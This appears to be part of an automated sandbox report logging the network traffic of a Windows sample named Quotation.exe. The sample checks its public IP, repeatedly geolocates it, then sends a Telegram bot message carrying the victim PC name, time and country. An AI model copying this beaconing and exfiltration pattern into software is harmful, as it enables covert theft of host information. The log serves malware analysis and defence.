Oct 7, 2024 10:13:38.680730104 CEST	320	IN	HTTP/1.1 200 OK Date: Mon, 07 Oct 2024 08:13:38 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 5bf9243a1944e74950f3501842f97e7f Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.8	49719	132.226.247.73	80	2168	C:\Users\user\Desktop\Quotation.exe

Timestamp	Bytes transferred	Direction	Data
Oct 7, 2024 10:13:39.319396973 CEST	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Oct 7, 2024 10:13:39.987910032 CEST	320	IN	HTTP/1.1 200 OK Date: Mon, 07 Oct 2024 08:13:39 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 1a5d3a9be7707feae2923668feab2dd3 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.8	49705	188.114.96.3	443	2168	C:\Users\user\Desktop\Quotation.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-07 08:13:30 UTC	84	OUT	GET /xml/8.46.123.33 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-10-07 08:13:30 UTC	686	IN	HTTP/1.1 200 OK Date: Mon, 07 Oct 2024 08:13:30 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 45145 Last-Modified: Sun, 06 Oct 2024 19:41:05 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=smW1bTnHfaFjhK4cQqlHe8FSA9NG7IiN3q3sWaaldm%2BaPru%2BkjwfDGNX%2FuqaSG11qL%2FvTu560U%2FbTixgIhAkMoDKWzNBL%2FYd7qqzsENi9m4vLZD5w8zaK%2BWArya9RH5eS0Vp%2Bivh"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8cec6ea9ae4c32f4-EWR
2024-10-07 08:13:30 UTC	340	IN	Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35 Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
2024-10-07 08:13:30 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.8	49706	188.114.96.3	443	2168	C:\Users\user\Desktop\Quotation.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-07 08:13:31 UTC	60	OUT	GET /xml/8.46.123.33 HTTP/1.1 Host: reallyfreegeoip.org
2024-10-07 08:13:31 UTC	676	IN	HTTP/1.1 200 OK Date: Mon, 07 Oct 2024 08:13:31 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 45146 Last-Modified: Sun, 06 Oct 2024 19:41:05 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=qCqvmXABYNygeGlPgSrRO82FuoYmZj2sfaOT0sOr%2BmQJBgsifxdlkuViH4GmoxuGVb7w1km1t6h20TCmzxCPT8r0wscvDuCbOjymPdqb%2FQvCLR%2FznhrkxWXVV19wf6rzggqbMtUe"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8cec6eaf2b184294-EWR
2024-10-07 08:13:31 UTC	340	IN	Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35 Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
2024-10-07 08:13:31 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.8	49708	188.114.96.3	443	2168	C:\Users\user\Desktop\Quotation.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-07 08:13:32 UTC	84	OUT	GET /xml/8.46.123.33 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-10-07 08:13:32 UTC	678	IN	HTTP/1.1 200 OK Date: Mon, 07 Oct 2024 08:13:32 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 45147 Last-Modified: Sun, 06 Oct 2024 19:41:05 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=mXjBcSTjWkNC287Jt2rUm%2BLZaQvNT2fnTY1PrETca30WYMoOtk1WxwJaFnSCKoysgiMlwtyFT6blS8slsYKy%2B6SoKxT2ZqYojIk7ns4RbKS2ZqY4TS%2FUds3ETaC%2FzZzKTCzjjuSF"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8cec6eb72b0341cf-EWR
2024-10-07 08:13:32 UTC	340	IN	Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35 Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
2024-10-07 08:13:32 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.8	49710	188.114.96.3	443	2168	C:\Users\user\Desktop\Quotation.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-07 08:13:33 UTC	84	OUT	GET /xml/8.46.123.33 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-10-07 08:13:34 UTC	708	IN	HTTP/1.1 200 OK Date: Mon, 07 Oct 2024 08:13:34 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 45149 Last-Modified: Sun, 06 Oct 2024 19:41:05 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=L7hfXsZSg8CQQzaFhVgUxfyfx5kGk6RUz9EUo%2FuTLxUot%2FyVMb8vIlly3OfTbVmZ76X%2Bnn6k7S7Mj82n3Hzk9eV0NioXxcF1HhmtyP6Gc9Mq78EMcxz8lD8RB7adR7Pf6j2cAA%2BF"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8cec6ebf6e0c0f8f-EWR alt-svc: h3=":443"; ma=86400
2024-10-07 08:13:34 UTC	340	IN	Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35 Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
2024-10-07 08:13:34 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.8	49712	188.114.96.3	443	2168	C:\Users\user\Desktop\Quotation.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-07 08:13:35 UTC	60	OUT	GET /xml/8.46.123.33 HTTP/1.1 Host: reallyfreegeoip.org
2024-10-07 08:13:35 UTC	676	IN	HTTP/1.1 200 OK Date: Mon, 07 Oct 2024 08:13:35 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 45150 Last-Modified: Sun, 06 Oct 2024 19:41:05 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=j9Wki5zT%2FHHYLPn5D0FuXGzWywoAYKn1NM7Q55DvaYBlGg2ORlElp2OM%2FXyg3i4YfqbrSt55p8HoT%2FlQbiEfkLZGCL1ZJTicqASrXKs1nMerNBP8ajDrdub9Qsfz4SGlhKKz9hPh"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8cec6ec7d8e80f4a-EWR
2024-10-07 08:13:35 UTC	340	IN	Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35 Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
2024-10-07 08:13:35 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.8	49714	188.114.96.3	443	2168	C:\Users\user\Desktop\Quotation.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-07 08:13:36 UTC	84	OUT	GET /xml/8.46.123.33 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-10-07 08:13:36 UTC	676	IN	HTTP/1.1 200 OK Date: Mon, 07 Oct 2024 08:13:36 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 45151 Last-Modified: Sun, 06 Oct 2024 19:41:05 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7NbuRw92w4r8Qm8udA1o%2FzW4qQQQ%2FBQ%2BWY9Jo8pChS8IsALnJSMMUeuXWBUIVv48JuvxIEZWk6IbjfpbvrXCUBtsdH9ahppJkRyXFJYHzJymYVx3hessAvqU4xoaDJdZyrouFqOu"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8cec6ecffcee43b9-EWR
2024-10-07 08:13:36 UTC	340	IN	Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35 Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
2024-10-07 08:13:36 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.8	49716	188.114.96.3	443	2168	C:\Users\user\Desktop\Quotation.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-07 08:13:37 UTC	84	OUT	GET /xml/8.46.123.33 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-10-07 08:13:38 UTC	684	IN	HTTP/1.1 200 OK Date: Mon, 07 Oct 2024 08:13:37 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 45152 Last-Modified: Sun, 06 Oct 2024 19:41:05 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=U2DNzCMGHX5ZhKH7tsYHUcsh%2FrXBwDWWZrKPRRqm8PoQ5uUJ5d%2BaT5I4iC0AiLfQ691C7j2nAxU%2BSDIDY2WJo%2BzRscTsHm1jNtdEcHVAC2ysVHNmbyci%2B%2FPTmrP%2FHcnppNNS7mPY"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8cec6ed8195f1977-EWR
2024-10-07 08:13:38 UTC	340	IN	Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35 Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
2024-10-07 08:13:38 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.8	49718	188.114.96.3	443	2168	C:\Users\user\Desktop\Quotation.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-07 08:13:39 UTC	84	OUT	GET /xml/8.46.123.33 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-10-07 08:13:39 UTC	674	IN	HTTP/1.1 200 OK Date: Mon, 07 Oct 2024 08:13:39 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 45154 Last-Modified: Sun, 06 Oct 2024 19:41:05 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9VsMG2yaJj6nipB7%2Ben2ooOFgn6x8YS9%2BAGismjdSd1DsZNPys8J7B25aHonSsnVqOzBEsvH8O7TYXnjTVqIbgBEiLjFBof41UK4QiA5UAJnVDr1h60Hmbg5L1ka5femMJXxV0V5"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8cec6ee05bb0423a-EWR
2024-10-07 08:13:39 UTC	340	IN	Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35 Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
2024-10-07 08:13:39 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.8	49720	188.114.96.3	443	2168	C:\Users\user\Desktop\Quotation.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-07 08:13:40 UTC	84	OUT	GET /xml/8.46.123.33 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-10-07 08:13:40 UTC	706	IN	HTTP/1.1 200 OK Date: Mon, 07 Oct 2024 08:13:40 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 45155 Last-Modified: Sun, 06 Oct 2024 19:41:05 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=8NSlhK9bbgtrwpsHeC5fZUEuwbLWo5kr0x2prXRNvZPPXWvd7iVygdlc5gcFwM02wv4VnG5V%2BWeKb5o%2BSyOnZMecWeuSWM5NL9l1zleqgyd%2BEeSNPoGG4xoJUVeXRvKwpOShxTP3"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8cec6ee87ca318ee-EWR alt-svc: h3=":443"; ma=86400
2024-10-07 08:13:40 UTC	340	IN	Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35 Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
2024-10-07 08:13:40 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.8	49721	149.154.167.220	443	2168	C:\Users\user\Desktop\Quotation.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-07 08:13:41 UTC	349	OUT	GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:377142%0D%0ADate%20and%20Time:%2007/10/2024%20/%2015:28:53%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20377142%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1 Host: api.telegram.org Connection: Keep-Alive
2024-10-07 08:13:41 UTC	344	IN	HTTP/1.1 404 Not Found Server: nginx/1.18.0 Date: Mon, 07 Oct 2024 08:13:41 GMT Content-Type: application/json Content-Length: 55 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-10-07 08:13:41 UTC	55	IN	Data Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 34 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 4e 6f 74 20 46 6f 75 6e 64 22 7d Data Ascii: {"ok":false,"error_code":404,"description":"Not Found"}

Target ID:	0
Start time:	04:13:26
Start date:	07/10/2024
Path:	C:\Users\user\Desktop\Quotation.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\Quotation.exe"
Imagebase:	0x450000
File size:	276'992 bytes
MD5 hash:	F485D8C73BCC8AC6AB3F432F2258D030
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
